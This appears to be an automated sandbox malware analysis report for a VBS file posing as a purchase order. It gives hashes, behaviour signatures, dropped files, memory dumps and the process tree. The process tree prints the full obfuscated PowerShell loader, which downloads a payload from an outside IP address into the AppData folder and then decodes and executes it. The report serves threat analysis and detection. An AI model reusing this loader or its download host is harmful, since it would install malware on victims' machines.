Overview

overview

10

Static

static

1

EFEMACPedi...18.vbs

windows7-x64

10

EFEMACPedi...18.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-04-2024 07:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EFEMACPedido0180040240418.vbs

  • Size

    187KB

  • MD5

    f08f508e797fa19d89a8a4688019fd99

  • SHA1

    32de77ff5689fbc68f64aa9cfd4405cc2686fd85

  • SHA256

    610119f52d69e8132b0130740836426d0b25fe5300ee4e12f2c51d1e36fec546

  • SHA512

    d33d6dbbac2945a22483026039a6f007698bbbc8a0e507a6cf14fb2a64e92125adbc5081c914fc5e7d6ff73c7018b28c38fa21b01a4c164b7e6fab7cc62c014d

  • SSDEEP

    3072:2MC8jqTKK8ccABOwbDS2y2zJETxUuoHh3uSH/OY6C1HwvBpVs2RtBZo5mFSarDYM:QTR8ccABOwbDA2zJETxVu1NH/vsd7tBb

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EFEMACPedido0180040240418.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4936
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
        3⤵
          PID:1936
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
            4⤵
              PID:4060
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 2436
              4⤵
              • Program crash
              PID:3780
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1108 -ip 1108
        1⤵
          PID:1484

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ysaxr3wm.hsr.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Eyelike0.For
          Filesize

          447KB

          MD5

          397424a6762fce62bd0c55cb362f4daf

          SHA1

          0a1968b4c10c88d849253bafa5d8c461b571a618

          SHA256

          f9daf79d74a43af5b935a283d1c6f98e7f55fa755205b6fe94fd8f75e6607e92

          SHA512

          1903aeed3166d4cc742847acb8b3f710e4e2f5186eb0a4f000da881578b2521931cad8cb76d510fa51a5f4b02cf75241b09c1d5e53ab2d0d94a2ebca036653a3

          Download Submit
        • memory/1108-24-0x0000000005180000-0x00000000051E6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/1108-39-0x0000000007180000-0x0000000007216000-memory.dmp
          Filesize

          600KB

          Download
        • memory/1108-34-0x00000000058C0000-0x0000000005C14000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/1108-44-0x00000000749E0000-0x0000000075190000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/1108-18-0x0000000002540000-0x0000000002576000-memory.dmp
          Filesize

          216KB

          Download
        • memory/1108-19-0x00000000749E0000-0x0000000075190000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/1108-20-0x0000000002650000-0x0000000002660000-memory.dmp
          Filesize

          64KB

          Download
        • memory/1108-21-0x0000000005290000-0x00000000058B8000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/1108-22-0x0000000004FC0000-0x0000000004FE2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1108-35-0x0000000005E70000-0x0000000005E8E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/1108-41-0x00000000082E0000-0x0000000008884000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/1108-40-0x00000000070E0000-0x0000000007102000-memory.dmp
          Filesize

          136KB

          Download
        • memory/1108-23-0x0000000005060000-0x00000000050C6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/1108-36-0x0000000005EB0000-0x0000000005EFC000-memory.dmp
          Filesize

          304KB

          Download
        • memory/1108-37-0x00000000076B0000-0x0000000007D2A000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/1108-38-0x0000000006410000-0x000000000642A000-memory.dmp
          Filesize

          104KB

          Download
        • memory/4936-13-0x0000023E9CC30000-0x0000023E9CC40000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4936-47-0x00007FFE376F0000-0x00007FFE381B1000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4936-14-0x0000023E9CC30000-0x0000023E9CC40000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4936-7-0x0000023E9CBF0000-0x0000023E9CC12000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4936-43-0x00007FFE376F0000-0x00007FFE381B1000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4936-17-0x0000023E9CC30000-0x0000023E9CC40000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4936-12-0x00007FFE376F0000-0x00007FFE381B1000-memory.dmp
          Filesize

          10.8MB

          Download